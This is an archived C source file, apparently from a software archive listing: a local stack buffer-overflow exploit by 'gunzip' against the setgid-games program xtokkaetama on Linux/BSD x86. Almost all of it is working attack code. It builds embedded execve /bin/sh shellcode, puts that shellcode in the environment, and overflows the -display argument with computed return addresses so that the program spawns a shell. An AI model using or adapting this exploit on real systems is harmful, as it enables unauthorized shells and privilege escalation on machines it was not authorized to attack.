home *** CD-ROM | disk | FTP | other *** search
- /*
- ** Linux/BSD x86 exploit vs xtokkaetama (c) gunzip
- ** I don't think you can do something nasty
- ** with egid=games however (so this is mostly useless)
- ** just written with the idea to make expl targetless.
- ** mostly ripped from gera's paper about bof :-o
- ** http://members.xoom.it/gunzip/
- ** gunzip@ircnet <techieone@softhome.net>
- **
- */
- #include <stdio.h>
- #include <unistd.h>
- #include <stdlib.h>
- #include <sys/types.h>
- #include <sys/stat.h>
-
- #define SIZE 20
- #define PATH "/usr/games/xtokkaetama"
-
- unsigned long STACKBASE()
- {
- __asm__ ( "movl %esp, %eax" );
- }
-
- /**
- ** linux and bsd execve shellcode by me
- **/
- unsigned char shellcode[] =
- "\x31\xc0\x99\x52\x68\x2f\x2f\x73"
- "\x68\x68\x2f\x62\x69\x6e\x89\xe3"
- "\x52\x53\x89\xe1\x52\x51\x53\x54"
- "\x8c\xe0\x85\xc0\x75\x04\xb0\x0b"
- "\xeb\x02\xb0\x3b\xcd\x80";
-
- int main( int argc, char *argv[] )
- {
- unsigned long i, ret ;
- unsigned char buf[ SIZE + 1 ],
- * env[]= { shellcode, NULL },
- * run[]= { PATH, "-display", buf, NULL };
-
- ret = ( ( STACKBASE() & 0xffff0000 ) | 0xfffa )
- - strlen(PATH) - strlen(shellcode) ;
-
- memset( buf, 0, sizeof(buf) );
-
- for( i = 0; i < sizeof(buf) - 4; i += 4 )
- *(unsigned long *)&buf[i] = ret;
-
- if( execve( run[0], (char **)run, (char **)env ) ) {
- perror( "execve" );
- exit( -1 );
- }
- }
-
